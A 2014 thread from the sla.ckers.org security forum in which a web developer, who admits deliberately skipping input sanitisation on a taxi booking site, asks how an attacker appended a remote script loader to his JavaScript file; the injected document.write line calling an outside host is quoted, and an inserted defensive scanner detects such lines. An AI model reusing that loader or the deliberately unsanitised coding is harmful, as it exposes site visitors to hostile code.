Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
injection alters javascript file
Posted by: darkstar
Date: June 02, 2014 12:22PM

OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/MySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half-arsed job hoping, maybe, that I'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
Did they get the FTP password? If so, how? What other avenues did/could they use to alter this file?

The js file only provided form validation, checking if boxes were filled in etc.

P.S. I won't be so neglectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

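A defensive check for the kind of appended line quoted in the post above, as an added example that is not part of the original thread: it scans a site-owned JavaScript file for document.write() calls that load a script from a host outside an allowlist. The function names, the allowlisted host and the sample file are assumptions constructed for illustration.

```javascript
// Added example (not from the thread). Hosts and sample content are constructed.
const ALLOWED_HOSTS = new Set(["www.taxi-bookings.example"]);

// document.write( ... ) / document.writeln( ... ) with a quoted string argument.
const WRITE_CALL = /document\.write(?:ln)?\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1/g;
// src value of a <script> tag inside the written markup (quotes may be escaped).
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*(?:\\?["'])?([^"'\\\s>]+)/gi;

// Return the lowercase host of an absolute or protocol-relative URL, else null.
function hostOf(url) {
  const m = /^(?:https?:)?\/\/([^\/?#:]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Report every document.write() that pulls a script from a non-allowlisted host.
function findInjectedScriptLoads(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const call of source.matchAll(WRITE_CALL)) {
    const line = source.slice(0, call.index).split("\n").length;
    for (const tag of call[2].matchAll(SCRIPT_SRC)) {
      const host = hostOf(tag[1]);
      // Relative URLs (host === null) load from the site's own origin.
      if (host !== null && !allowedHosts.has(host)) {
        findings.push({ line, host, url: tag[1] });
      }
    }
  }
  return findings;
}

// Constructed sample: a form-validation file with one legitimate local include
// and one appended remote loader of the shape described in the post.
const SAMPLE = [
  "function validateBooking(form) {",
  "  if (form.pickup.value === '') { alert('Pickup address required'); return false; }",
  "  return true;",
  "}",
  "document.write('<script src=\"/js/datepicker.js\"><\\/script>');",
  "document.write('<script type=\"text/javascript\" src=\"http://injected.example/x.php?id=1\"></script>');",
].join("\n");

for (const f of findInjectedScriptLoads(SAMPLE)) {
  console.log(`line ${f.line}: external script from ${f.host} (${f.url})`);
}
```

This is a triage heuristic only: a loader built by string concatenation or encoding will not match, so it complements comparing deployed files against known-good hashes rather than replacing that comparison.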
Re: injection alters javascript file
Posted by: darkstar
Date: June 13, 2014 03:03PM

I'm not getting any replies, have I asked a dumb question?
